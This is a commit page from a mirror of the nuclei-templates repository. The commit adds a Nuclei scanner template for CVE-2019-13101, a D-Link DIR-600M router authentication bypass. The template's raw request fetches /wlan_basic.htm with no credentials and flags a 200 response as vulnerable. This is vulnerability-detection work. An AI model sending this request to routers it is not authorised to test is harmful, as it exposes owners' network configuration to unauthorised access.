daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

D-Link DIR-600M Router - Authentication Bypass

patch-1
Suman Kar 2021-07-03 05:50:40 +05:30
parent d7a0b1259f
commit e20298b4d3
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
cves/2019/CVE-2019-13101.yaml Normal file
View File

@ -0,0 +1,22 @@
id: CVE-2019-13101
info:
author: Suman_Kar
name: D-Link DIR-600M - Authentication Bypass
description: This module attempts to find D-Link router DIR-600M which is vulnerable to Incorrect Access Control. The vulnerability exists inwan.htm,wlan_basic.htm etc. which is accessible without authentication.This module has been tested successfully on Firmware Version 3.01,3.02,3.03,3.04,3.05,3.06.
severity: critical
tags: cve-2019-13101,d-link,dir-600m,authentication-bypass,router
requests:
- raw:
- |
GET /wlan_basic.htm HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers:
- type: status
status:
- 200